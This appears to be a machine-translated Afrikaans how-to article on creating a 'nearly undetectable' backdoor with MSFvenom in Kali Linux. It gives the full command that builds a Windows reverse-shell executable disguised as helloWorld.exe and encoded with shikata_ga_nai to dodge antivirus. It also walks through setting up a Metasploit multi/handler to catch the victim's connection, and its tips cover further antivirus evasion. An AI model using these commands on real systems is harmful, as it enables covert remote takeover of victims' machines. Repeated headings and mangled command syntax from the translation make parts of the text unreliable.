Hoe om 'n byna onopspoorbare agterdeur te skep met MSFvenom in Kali Linux

INHOUDSOPGAWE:

Hoe om 'n byna onopspoorbare agterdeur te skep met MSFvenom in Kali Linux
Hoe om 'n byna onopspoorbare agterdeur te skep met MSFvenom in Kali Linux

Video: Hoe om 'n byna onopspoorbare agterdeur te skep met MSFvenom in Kali Linux

Video: Hoe om 'n byna onopspoorbare agterdeur te skep met MSFvenom in Kali Linux
Video: How to FUNNEL troops (subscriber request!!). 2024, Mei
Anonim

'N Agterdeur word gebruik om veiligheidsmeganismes te omseil, dikwels in die geheim en meestal onopspoorbaar. Deur MSFvenom, die kombinasie van msfpayload en msfencode, te gebruik, is dit moontlik om 'n agterdeur te skep wat weer met die aanvaller verbind kan word deur gebruik te maak van omgekeerde dop -TCP. Om 'n agterdeur te ontwikkel, moet u die handtekening van u malware verander om antivirusprogrammatuur te vermy. Voltooi hierdie projek op 'n paar rekenaars waartoe u toestemming het, en in die proses leer u meer oor rekenaarsekuriteit en hoe hierdie soort agterdeur werk.

Stappe

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 1
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 1

Stap 1. Begin Kali en begin die terminale konsole

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 2
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 2

Stap 2. Tik ifconfig om die koppelvlak te vertoon en kyk na u IP -adres

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 3
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 3

Stap 3. Tik msfvenom -l encoders om die lys van encoders te wys

U sal x86/shikata_ga_nai as die encoder gebruik

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 4
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 4

Stap 4. Tik "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe

  • -a x86 -platform vensters dui argitektuur aan om te gebruik.
  • -p windows/shell/reverse_tcp dui die laaivragte aan om in te sluit.
  • LHOST dui die IP -adres van die luisteraar aan.
  • LPORT dui die luisteraarpoort aan.
  • -b "\ x00" dui aan om slegte karakter (nul grepe) te vermy.
  • -e x86/shikata_ga_nai dui die encoders se naam aan.
  • -f exe> helloWorld.exe dui die formaatuitset aan.
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 5
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 5

Stap 5. Tik msfconsole om die Metasploit te aktiveer

Nou het u u agterdeur gegenereer. As die slagoffer op helloWorld.exe klik, word die doplading wat ingebed is, geaktiveer en weer 'n verbinding met u stelsel gemaak. Om die verbinding te ontvang, moet u die multi-hanteerder in Metasploit oopmaak en die laaivragte stel

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 6
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 6

Stap 6. Tik gebruik exploit/multi/handler

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 7
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 7

Stap 7. Tik set payload windows/shell/reverse_tcp

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 8
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 8

Stap 8. Tik wys opsies om die module na te gaan

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 9
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 9

Stap 9. Tik stel LHOST 192.168.48.129

'LHOST' dui die IP -adres van die luisteraar aan

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 10
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 10

Stap 10. Tik stel LPORT 4444

"LPORT" dui die luisteraarpoort aan

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 11
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 11

Stap 11. Tik hardloop en wag vir die verbinding vanaf die slagoffer se masjien

Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 12
Skep 'n byna onopspoorbare agterdeur met MSFvenom in Kali Linux Stap 12

Stap 12. Wag totdat die slagoffer op helloWorld.exe klik

Dan word u suksesvol met die slagoffer se masjien verbind.

Wenke

  • Die gebruik van -i in MSFvenom verteenwoordig die iterasies van die kodering. Soms kan meer herhalings help om die AV -sagteware te ontduik.
  • U het geleer hoe u die agterdeur en gekodeerde kan genereer deur MSFvenom te gebruik, maar hierdie metode werk deesdae nie perfek teen sommige AV -sagteware nie. Die rede hiervoor is die uitvoeringsjablone in MSFvenom. Die AV -verkopers het die statiese handtekening van hierdie sjablone bygevoeg en soek dit net. Die oplossing vir hierdie probleem is om 'n ander uitvoeringssjabloon of ander gereedskap te gebruik.

Aanbeveel: